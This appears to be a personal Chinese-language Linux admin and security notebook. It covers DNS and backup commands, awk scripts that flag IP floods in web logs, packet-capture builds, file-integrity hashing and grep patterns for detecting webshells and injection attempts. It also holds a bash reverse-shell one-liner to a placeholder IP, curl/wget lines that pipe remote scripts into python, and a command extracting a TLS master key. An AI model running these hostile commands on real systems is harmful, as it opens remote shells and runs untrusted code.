resolv-file=/etc/resolv.dnsmasq.conf
strict-order
no-hosts
addn-hosts=/etc/dnsmasq_hosts
cache-size=1500
listen-address=172.31.114.114 #listen-address这个必须加, 不然跨网段就不能回复dns查询结果了
#raspberry备份
dd if=/dev/sdb | gzip>/tmp/img_backup2.gz
#还原
dd if=/root/2016-02-09-raspbian-jessie-lite.img of=/dev/sdb bs=4M
dd if=2016-02-09-raspbian-jessie-lite.img | pv | sudo dd of=/dev/sdX bs=4M
#raspberry还原
sudo gzip -dc /home/pi/img_backup.gz | sudo dd of=/dev/xxx
#raspberry备份1
dd if=/dev/mmcblk0 of=pi-debian-unencrypted-backup.img
#cpu压力测试
sysbench --test=cpu --num-threads=8 --max-requests=100000 run
sysbench --test=cpu --num-threads=1 --max-requests=10000 run
#/tmp 目录防止清空
#cat /etc/tmpfiles.d/tmp.conf
d /tmp 1777 root root 20d
#wget下载JDK
wget --header "Cookie: oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u131-b11/d54c1d3a095b4ff2b6607d096fa80163/jdk-8u131-linux-x64.tar.gz
#jdk8
https://www.so-cools.com/test/jdk8.tar.gz
#jdk 镜像
http://mirrors.linuxeye.com/jdk/
#解决mysql更新错误
#apt-get upgrade更新后的错误提示
# insserv: warning: current start runlevel(s) (empty) of script `mysql' overrides LSB defaults (2 3 4 5)
#初看以为这还不容易么
#systemctl enable mysql 结果仍然报错
#Synchronizing state of mysql.service with SysV init with /lib/systemd/systemd-sysv-install...
#Executing /lib/systemd/systemd-sysv-install enable mysql
insserv: warning: current start runlevel(s) (empty) of script `mysql' overrides LSB defaults (2 3 4 5).
#update-rc.d: error: no runlevel symlinks to modify, aborting!
#突然想起以前是用 sysv-rc-conf 禁用了mysql
sysv-rc-conf mysql on
ap-get upgrade
# aria2c下载
aria2c -c -x16 -s20 -j20 http://www.xxx.com/xx.exe
#编译apk
#查看详细报错信息
/opt/android-studio/gradle/gradle-2.14.1/bin/gradle build --stacktrace
#根据WEB日志文件和IP,统计时间段内IP访问数量,可用于CC检测
#要安装gawk
apt-get install gawk
日志样本
157.15.14.19 - - 06 Sep 2016 09:13:10 +0300 "GET /index.php?id=1 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:13:11 +0300 "GET /index.php?id=2 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:13:12 +0300 "GET /index.php?id=3 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:14:13 +0300 "GET /index.php?id=4 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:14:14 +0300 "GET /index.php?id=5 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:15:15 +0300 "GET /index.php?id=6 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:15:16 +0300 "GET /index.php?id=7 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:15:17 +0300 "GET /index.php?id=8 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:16:10 +0300 "GET /index.php?id=9 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:16:10 +0300 "GET /index.php?id=10 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
8.8.8.8 - - 06 Sep 2016 09:17:10 +0300 "GET /index.php?id=11 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
9.9.9.9 - - 06 Sep 2016 09:17:10 +0300 "GET /index.php?id=12 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:18:10 +0300 "GET /index.php?id=13 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:19:10 +0300 "GET /index.php?id=14 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:19:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:20:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
123.123.123.123 - - 06 Sep 2016 09:21:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.15.14.19 - - 06 Sep 2016 09:22:10 +0300 "GET /index.php?id=15 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
cat 5.txt |awk '{print $7,$1}' |awk -F: '{print $1*60+int($2/2),$0}' |sort |uniq -c -f2 |awk '{if($1>5){print $0}}'
或者
awk -v Interval=5 -v Trig=5 -F '[[:blank:]]*|:' '
{
ThisTime = $7 * 60 + $8
#if new cycle (so this line is not in the cycle)
if ( ThisTime > ( LastTic + Interval ) ) {
# check and print last cycle hit
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
# reset reference
split( "", IPCounts)
LastTime = $4 " " $5 " " $6 " " $7 ":" sprintf( "%2d", ( $8 - ( $8 % Interval) )) ":00"
LastTic = $7 * 60 + ( $8 - ( $8 % Interval) )
}
# add this line to new cycle
IPCounts[ $1]++
}
END {
# print last cycle
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
}
' YourFile
#若日志样本为
op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST /zabbix/jsrpc.php?output=json-rpc HTTP/1.1" 200 77 "0.316" "op.g.cc/?ddreset=1&sid="; "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)" "-" "-"upstream_response_time "0.316" request_time "0.316" dd.g.cc 60.223.153.54 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.53:8012 "GET /?ts=1479670682&uid=&mid=&cs= HTTP/1.1" 200 479 "0.039" "-" "Dalvik/2.1.0 (Linux; U; Android 5.0.2; Redmi Note 2 MIUI/V8.0.2.0.LHMCNDG)" "-" "5.0.1.0002"upstream_response_time "0.039" request_time "0.039"
#则整理脚本为
awk -v Interval=5 -v Trig=1000 -F '[[:blank:]]*|:' '
{
# using format log
# 157.15.14.19 - - 06 Sep 2016 09:13:10 +0300 "GET /index.php?id=1 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
# $1 2 3 4 5 6 7 8 9 10 11 ...
ThisTime = $6 * 60 + $7
#if new cycle (so this line is not in the cycle)
if ( ThisTime > ( LastTic + Interval ) ) {
# check and print last cycle hit
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
# reset reference
split( "", IPCounts)
LastTime = $5 ":" $6 ":" sprintf( "%2d", ( $7 - ( $7 % Interval) )) ":00 +800]"
LastTic = $6 * 60 + ( $7 - ( $7 % Interval) )
}
# add this line to new cycle
IPCounts[ $2]++
}
END {
# print last cycle
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
}
' access.log-20161122
# for format of log
# op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST ...
# $1 2 3 4 5 6 7 8 9 10 11 ...
# change:
# $7 by $6, $8 by $7
# LastTime = $5 ":" $6 ":" sprintf( "%2d", ( $7 - ( $7 % Interval) )) ":00 +800]"
# IPCounts[ $2]++
#上面日志存在跨天的 (注意里面变量计算的空格,不然会出错)
awk -v Interval=5 -v Trig=10 -F '[[:blank:]]*|\\[|/|:' '
{
# using format log 6->9 7->10
# 157.15.14.19 - - 06 Sep 2016 09:13:10 +0300 "GET /index.php?id=1 HTTP/1.1" 200 16977 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
# $1 2 3 4 5 6 7 8 9 10 11 ...
ThisTime =$6 * 10000 + $9 * 60 + $10
#if new cycle (so this line is not in the cycle)
if ( ThisTime > ( LastTic + Interval ) ) {
# check and print last cycle hit
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
# reset reference
split( "", IPCounts)
LastTime = "[" $6 "/" $7 "/" $8 ":" $9 ":" sprintf( "%2d", ( $10 - ( $10 % Interval) )) ":00 +800]"
LastTic = $6 * 10000 + $9 * 60 + ( $10 - ( $10 % Interval) )
}
# add this line to new cycle
IPCounts[ $2]++
}
END {
# print last cycle
for( IP in IPCounts) if ( IPCounts[ IP] > Trig) print LastTime " " IP " : " IPCounts[ IP]
}
' access.log-20161122
# op.g.cc 124.145.36.121 - - [21/Nov/2016:03:38:02 +0800] ==> 172.11.0.238:80 "POST ...
# $1 2 3 4 5 6 7 8 9 10 11 12
#反弹shell
bash -i & /dev/tcp/1.2.3.4/7788 0&1
#本地监听:nc -l 7788
#查看连接状态
netstat -n|grep ^tcp|awk '{print $NF}'|sort -nr|uniq -c
#静态编译openresty(建议为alpine)
wget https://github.com/openresty/openresty/releases/download/v1.11.2.2/openresty-1.11.2.2.tar.gz --no-check-certificate
wget https://www.openssl.org/source/openssl-1.1.0c.tar.gz --no-check-certificate
apk add linux-headers
apk add libressl-dev
apk add libcrypto1.0
./configure --with-ld-opt="-static" && make -j2 && make install
#alpine docker(添加用户为adduser )
FROM alpine
ENV NGINX_VER nginx-1.11.6
ENV OPENSSL_VER openssl-1.0.2j
#ENV OPENSSL_VER openssl-1.1.0-pre6
# apk add linux-headers
RUN echo "http://mirrors.ustc.edu.cn/alpine/v3.5/main" > /etc/apk/repositories \
&& echo "http://mirrors.ustc.edu.cn/alpine/v3.5/community" >> /etc/apk/repositories
RUN apk update
RUN apk add \
pcre-dev \
zlib-dev \
g++ \
make \
perl \
wget
#方便查看 urldecode
cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])'
#删除含有匹配字符的行
sed -i '/keywords/d' access.log
#批量提取(全流量中)数据包并且过滤数据
#!/bin/bash
for file in ` ls $1 `
do
parse_pcap -vvb $file | grep -v "Host:" | grep -v "Cookie:" | grep -v "User-Agent:" | grep -v "Accept:" | grep -v "Accept:" | grep -v "Accept-Language:" | grep -v "Accept-Encoding:" | grep -v "Connection:" | grep -v "Content-Type:" | grep -v "Content-Length" | grep -v "Server"
done
#得到https master key
openssl s_client -ign_eof -connect 123.57.55.183:443 < <( echo -e "GET / HTTP/1.1\nHost: www.so-cools.com\nConnection: close\n\n" ) | grep 'Session-ID:\|Master-Key:'
echo "export SSLKEYLOGFILE=~/tls/sslkeylog.log" >> ~/.bash_profile && . ~/.bash_profile #然后再打开浏览器就行 不过只有pre_master
#wireshark 编译基于pf_ring的libpcap
#先安装好基于pf_ring的libpcap
#下载解压wireshark 源码
./configure --prefix /opt/wireshark/build/ --with-libcap=/opt/pf_rinf/build --with-qt=4 --with-gtk=no --enable-tfshark --with-lua --with-geoip && make &&make install
#LDFLAGS="-L/opt/pf_rinf/build/lib" CFLAGS="-I/opt/pf_rinf/build/include" make 这样make没用
#注意pf_ring lib 路径添加到 ld.so.conf.d 中 ldconfig
#查看SO文件版本
readelf -a xxx.so.1.7.4 #然后查看版本号
#查找新文件
#!/bin/bash
while getopts 'p:t:d:' OPT; do
case $OPT in
p)
filepath="$OPTARG";;
t)
mtime="$OPTARG";;
d)
isdebug="$OPTARG";;
?)
echo "Usage: `basename $0` [options] -p path -t modiytime -d isshow no Permission"
esac
done
if [[ -z $filepath ]] ; then
filepath="/home/tomcat/"
fi
if [[ -z $mtime ]] ; then
mtime="1"
fi
if [[ -z $isdebug ]] ; then
cmd_str="find ${filepath} \( -iname '*.php' -o -iname '*.jsp' \) -mtime -${mtime} 2>/dev/null"
else
cmd_str="find ${filepath} \( -iname '*.php' -o -iname '*.jsp' \) -mtime -${mtime}"
fi
result=$(eval $cmd_str)
if [[ -z $result ]] ; then
echo "no_file_found_wow"
else
echo $result
fi
#shell中分号作用之表示分隔符(也可当换行理解)
#第一种
test(){
if [ 1 -eq 1 ]; then
echo "1=1"
else
echo "1!=1"
fi
}
#第二种
test1(){
if [ 1 -eq 1 ]
then echo "1=1"
else echo "1!=1"
fi
}
#第三种
test2(){ if [ 1 -eq 1 ] ; then echo "1=1" ; else echo "1!=1" ; fi }
#firefox 安装flash
#https://get.adobe.com/cn/flashplayer/otherversions/ 下载 NPAPI
cp libflashplayer.so /usr/lib/firefox/browser/plugins/
#debian U盘安装 物理机 差网卡驱动
先下载debian镜像 比如8.6
用universal-usb-installer做U盘启动盘(不能用win32diskimager做U盘启动盘,因为它做的会导致U盘中的文件夹不能写,不能添加后面要的驱动信息)。注 Step1:选择最后一个 try unlisted linux iso
下载http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/jessie/current/firmware.zip 解压,把里面所有内容复制到U盘启动盘的firmware文件夹中
下载firmware-realtek_0.43_all.deb 用dpkg解包,并把lib/firmware 复制到U盘启动盘的firmware文件夹中
正常引导装系统,应该就不会出现 缺失的固件是:rtl_nic/rtl8105e-1.fw 这样的提示了
登陆成功后,再apt-get install firmware-linux-nonfree
#debian 安装网卡驱动
apt-get install firmware-*
#iptables 端口镜像(daemonlogger 这工具也能做镜像 或者 https://code.google.com/archive/p/port-mirroring/ )
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147
iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147
iptables -t mangle -A PREROUTING -d 0.0.0.0/0 -j TEE --gateway 172.20.8.147
iptables -t mangle -A POSTROUTING -s 0.0.0.0/0 -j TEE --gateway 172.20.8.147
#linux终端高亮转换成html高亮显示(如ls grep 高亮结果显示为html 格式)
#aha
apt-get install aha && grep "a" /etc/passwd | aha > /tmp/a.html
#ansi2html
apt-get install kbtin && grep "a" /etc/passwd | ansi2html > /tmp/a.html
#php ansi-color 终端高亮转换成html高亮显示(如ls grep 高亮结果显示为html 格式)
https://github.com/Alanaktion/ansispan-php #只支持旧版本, 新版本暂不支持
#查找可写目录
#!/bin/bash
search_dir=$(pwd)
writable_dirs=$(find $search_dir -type d -perm 0777)
for dir in $writable_dirs
do
#echo $dir
find $dir -type f -name '*.php'
done
#grep webshell
grep --colour=always -n -i -E -e '(eval|eval_r|exec|passthru|shell_exec|system|proc_open|ReflectionFunction|assert|fwrite|fopen)\s*\(\s*(\\\$|\$)(HTTP_POST_VARS|HTTP_GET_VARS|HTTP_SERVER_VARS |_POST|_REQUEST|_GET|_SESSION|_SERVER)\s*\[\s*' -e 'eval\s*\(\s*[^\)]*base64_decode' -e '(\$|\\\$)_(GET|POST)\s*\[.*?\]\s*\(\s*(\$|\\\$)_(GET|POST)\s*\[' -e 'chr\s*\(*\s*ord\s*\(\s*' -e '(gzuncompress|gzinflate)\s*\(\s*base64_decode\s*\(' -e 'chr\s*\(\s*[0-9]+\s*\)\s*\.\s*chr\s*\(\s*[0-9]+\s*\)' -e '\$.+=\s*[.-"]assert[.-"]\s*;' -e '\b(pack)\s*\(.*\);' -e '\\x[0-9]+\\x[0-9]+\\x[0-9]+' -e '(udp|tcp):\/\/' -e 'function_exists\s*\(\s*[.-"](popen|exec|proc_open|system|passthru|posix_kill|posix_getpwuid|posix_getegid)[.-"]\s*\)' -e '\\x[0-9]+' -e '(c99shell|permission\s*denide|\/etc\/passwd|exploit-db\.com|web\s*shell|\/\*-\/\*-\*\/|\/bin\/sh|phpinfo\s*\(|str_rot13\s*\()' -e '\$\{[.-"](_POST|_REQUEST|_GET|_SESSION|_SERVER)[.-"]\}' -e 'preg_replace\s*\(.*\/e.*\,\s*\$(_POST|_REQUEST|_GET|_SESSION|_SERVER)\s*' -e 'e[.-"]\s*\.\s*[.-"]v[.-"]\s*\.\s*[.-"]a[.-"]\s*\.\s*[.-"]l' -e 'ev[.-"]\s*\.\s*[.-"]a[.-"]\s*\.\s*[.-"]l' -e 'ev[.-"]\s*\.\s*[.-"]al' -e 'eva[.-"]\s*\.\s*[.-"]l' xxx.php
grep --colour=always -n -i -E -e 'getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(' -e 'Runtime\s*\.\s*getRuntime' -e 'getRealPath\s*\(' -e 'PythonInterpreter' -e '\/tmp\/' xxx.jsp
#pf_ring安装
git clone https://github.com/ntop/PF_RING.git
apt-get install linux-headers-3.16.0-4-amd64
cd kernel/ && make && make install
cd userland/lib/ && ./configure --prefix=/usr/local/pfring && make && make install
cd userland/libpcap/ && ./configure --prefix=/usr/local/pfring && make && make install
cd userland/tcpdump/ && ./configure --prefix=/usr/local/pfring && make && make install
#安装内核模块
insmod /lib/modules/3.16.0-4-amd64/kernel/net/pf_ring/pf_ring.ko && lsmod |grep pf_ring
/sbin/modprobe pf_ring transparent_mode=0 min_num_slots=65534 && cat /proc/net/pf_ring/info
echo "/sbin/modprobe pf_ring transparent_mode=0 min_num_slots=65534" >> /etc/rc.local #添加开机自启动
#curl wget 调用安装脚本执行区别
wget "http://xxxx/test/a1.py" -O - |python - /
curl http://xxxxx/test/a1.py |python - /
#ansible reboot
ansible all -i hosts -u root -k -m shell -a "shutdown -r +1" -f 10
#grep 关于类似 “$xxx=’e’.’va’.’l’;”类似拼接字符串
grep -n -i -E -e 'e[ !-0]*v[ !-0]*a[ !-0]*l[ !-0]*' #注 -e ' ' 里面建议用单引号包含,双引号坑太多,另若正则里面还包含单引号, 就用 [!-0] 这里面就包含很多特殊特号,曲线救国
#关于grep 单引号与双引号区别
grep "$a" file #引用变量a,查找变量a的值
grep '$a' file #查找'$a'字符串
grep '\\' file #查找'\'字符
grep "\\\\" file #查找'\'字符
# $ " ~ \ 在四个字符在双引号中有特殊含义,在单引号中无特殊含义
##xargs find grep 查找关键字 多个文件类型
find /var/log \( -iname "*.php" -o -iname "*.txt" \) -print0 |xargs -i --null grep -n -i -E -e 'select.+from.*HTTP/(1|2)\.' -e 'union.+select.*HTTP/(1|2)\.' {} #注 -o -a -not 分别表示 or and not 关系 逻辑条件多个时需要 用 \( \) 包含起来
#xargs find grep 查找关键字
find /var/log -iname "*.php" -print0 |xargs -i --null grep -n -i -E -e 'select.+from.*HTTP/(1|2)\.' -e 'union.+select.*HTTP/(1|2)\.' {} #注 find的 -print0 和 xargs --null 处理文件名中特殊字符转义用
#查找当前时间到10天之前这段时间内哪些文件被修改了
find /home/ -name "*.php" -mtime -10 #mtime ctime atime 分别表示不同意思
#vbox 桥接报错
#root
modprobe vboxdrv
modprobe vboxnetflt
#对gzexe加密的脚本解密
tail -n +44 abc > a.gz #44行起是乱码就表示gz数据开始存放的行
gunzip a.gz
#实际解压一个独立安装包文件
tail -n +77 Xmirror3.1.0.3116_ubuntu_x64.bin > new.tar.gz
tar zxvf new.tar.gz #完成解包操作
#rsync客户端同步文件
rsync -av --bwlimit=1500 iov_read@172.1.0.24:/data/backup/weblog/nginx-common/ /data/rsync/
datestr=$(date +"%Y-%m-%d %H:%k:%M")
echo $datestr >> /opt/rsync/cron.txt
查找各个子文件夹的文件数量
for i in $(ls -d */|awk ‘{print $1}’);do echo $i $(ls “./”$i -lR |wc -l);done
for i in $(ls -d */);do echo $i $(ls $i -lR|wc -l)个 $(du -sh $i|awk ‘{print $1}’);done
for i in $(ls -d */);do echo $i $(ls $i -lR 2>/dev/null|wc -l) $(du -sh $i 2>/dev/null|awk ‘{print $1}’);done |sort -k 2 -nr
得到x-y 行之间的文件内容
awk ‘NR >= -1 && NR <= 2’ /etc/passwd
sed -n ‘5,6p’ /etc/passwd
监控某文件,并提取增量
OLD_IFS="$IFS"
IFS=" "
while watchInfo=`inotifywait -q --format '%e %f' -e modify,create /tmp/test1/db`;do
IFS=" "
watchInfo=($watchInfo)
lines=`wc -l /tmp/test1/db/${watchInfo[1]}`
linesarr=($lines)
offsetinfo=`cat /tmp/offset`
if [ -z "$offsetinfo" ] ; then
info=`sed -n "1,${linesarr[0]}p" /tmp/test1/db/${watchInfo[1]}`
else
offsetinfoarr=($offsetinfo)
startline=$(echo "${offsetinfoarr[0]}+1"|bc)
info=`sed -n "$startline,${linesarr[0]}p" /tmp/test1/db/${watchInfo[1]}`
fi
echo "${linesarr[0]} ${watchInfo[1]}" > /tmp/offset
echo $info
done
IFS="$OLD_IFS"
1、Bash的陷阱: http://blog.charlee.li/bash-pitfalls/
2、Bash空格的那些事: http://www.igigo.net/post/archives/152
#快速查找修改过的文件
1 安装md5deep或者hashdeep 推荐md5deep(https://github.com/madscientist42/md5deep)
2 用md5deep创建快照
md5deep -r /tmp/test1/ > /tmp/md54.txt 或者 find /tmp/test1 -type f -print0 |xargs -0 md5sum > /tmp/md54.txt
3 校验
md5sum -c /tmp/md54.txt
#or
md5sum -c /tmp/md51.txt 2>/dev/null|grep "失败" |awk '{print $1}'
#md5sum校验1
find ./ -type f -print0 | xargs -0 md5sum > ./my.md5
md5sum -c my.md5
#查找近期修改的文件
find $1 -type f -exec stat --format '%Y :%y :%n' "{}" \; |grep -v "wpdatabase"|sort -nr |cut -d: -f2- | head -n 50
#iptables ip段
iptables -A INPUT -m iprange --src-range 192.168.1.2-192.168.1.7 -j DROP
iptables -A INPUT -m iprange --dst-range 192.168.1.2-192.168.1.7 -j DROP
#访问日志安全审计
time grep -n -i -E -e 'select.+from.*HTTP/(1|2)\.' -e 'java\.lang.*HTTP/(1|2)\.' -e '\.\./.*HTTP/(1|2)\.' -e 'information_schema.*HTTP/(1|2)\.' -e 'etc/passwd.*HTTP/(1|2)\.' -e 'xwork\.MethodAccessor.*HTTP/(1|2)\.' -e '/\*!.*\*/.*HTTP/(1|2)\.' -e '%3C(%20)*(iframe|script|body|img|layer|div)%3E.*HTTP/(1|2)\.' -e '(cmd|diy|shell|phpspy|jspspy).*\.jsp.*HTTP/(1|2)\.' -e '(vhost|bbs|hostname|wwwroot|www|site|root|hytop|flashfxp).*\.(rar|zip|tar.gz|gz).*HTTP/(1|2)\.' -e '(attachments|upimg|images|css|uploadfiles|html|uploads|templets|static|template|data|inc|forumdata|upload|includes|cache|avatar).*\.(jsp|php).*HTTP/(1|2)\.' -e '\.(svn|git|htaccess|bash_history|bak|inc|old|mdb|sql|backup|java|class|rar|zip|tar.gz|gz).*HTTP/(1|2)\.' -e '(HTTrack|harvest|audit|dirbuster|pangolin|nmap|sqln|x-scan|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|PycURL|zmeu|BabyKrokodil|netsparker|httperf|bench|appscan)' -e '(cmd|diy|shell|phpspy|jspspy|b374k).*\.php.*HTTP/(1|2)\.' logs/new.log
#批量解压GZ文件
#!/bin/bash
#paths="/data/etc_nginx_logs/logs"
paths="/data/var_log_nginx/logs"
#savepath="/ungzdata/etc"
savepath="/ungzdata/var"
for i in `cd ${paths} && ls *.gz`
do
echo $i
gunzip -c ${paths}/$i > ${savepath}/$i.log
done
#查找差异 对比
diff --changed-group-format="%>" --unchanged-group-format="" file1 file2
sdiff 1.txt 2.txt |grep '[<>|]'
vimdiff 1.txt 2.txt
#批量scp
#!/bin/bash
for line in `cat result`
do
if [[ $line =~ "var_log_nginx" ]]
then
scp -r -l 10000 $line scpuser@172.16.20.7:/data/scp/var/
else
scp -r -l 10000 $line scpuser@172.16.20.7:/data/scp/etc/
fi
done
echo "good"
#查看涉及安全的更新
apt-get -s dist-upgrade |grep "^Inst" |grep -i securi
#生成文件hash file integrity to monitor
import commands
#shell
#for i in {"/etc","/bin","/sbin","/usr/bin","/usr/sbin"};do md5deep -r $i >>/usr/local/file_hashs.txt;done
dirs =["/bin/","/etc/","/sbin/","/usr/bin","/usr/sbin"]
for dir in dirs:
cmd = "md5deep -r "+dir+" >>/usr/local/file_hashs.txt"
print cmd
commands.getstatusoutput(cmd)